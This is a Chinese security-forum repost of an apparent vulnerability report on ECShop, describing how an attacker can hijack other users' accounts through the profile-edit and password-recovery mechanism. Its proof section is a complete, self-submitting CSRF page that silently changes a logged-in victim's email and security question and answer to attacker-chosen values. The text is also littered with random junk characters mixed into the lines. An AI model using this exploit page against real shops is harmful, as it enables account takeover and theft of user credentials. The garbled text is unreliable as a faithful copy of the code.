中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
" L; v) T' R" z7 n/ N. _; `ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
) ^0 P& a, ?! r- a/ e
# l- q/ ?) `+ `  HDemo For:http://www.wooyun.org/bug.php?action=view&id=395
: h6 w$ V( P! N& ]
  M+ J( Y# Q4 d$ |$ ]6 H详细说明:
/ z  ?& R9 G2 E8 w2 l" s, Q% |利用csrf和xss可以突破官方所说的“障碍”
: u  n0 t, a  L, j5 m* Lxss版本已经有人说明7 u$ Q  u2 ]$ M
这里给出csrf版本
/ z/ U2 @# Q' ~* S2 X
+ _; @$ p; ]  Q4 \8 {漏洞证明:
6 h( H% ?& s% ?4 O3 `<html>! U. r0 S0 K# T2 t# m; T1 {
<body>
; _3 T7 l5 R- E<form action="http://www.wooyun.org/ecshop/user.php" method="POST">" h! V4 g+ t: o' r! E3 A- h
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
- G) M8 C8 @8 X; g<INPUT TYPE="text" NAME="act" value="act_edit_profile"># f+ o+ U9 p' W1 _" O% V
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
( {& N; W; i- X) S9 a$ |2 g<INPUT TYPE="text" NAME="passwd_answer" value="exploit">4 G8 M- `) I: }/ x
</body>' t1 B# y# e8 y$ }2 K' ~; c- Q
<script>
$ J$ C% {/ W3 G3 X% }document.forms[0].submit();0 X* R' p6 T  x1 }; d+ g% W* l
</script>* ]/ @+ K& u+ B4 v  k! _; t& `
</html>
/ O6 |0 i7 f4 O0 T# ?1 N构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失3 m" v; Y. {. y

2 u* q, k) n* {2 S1 l; F




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2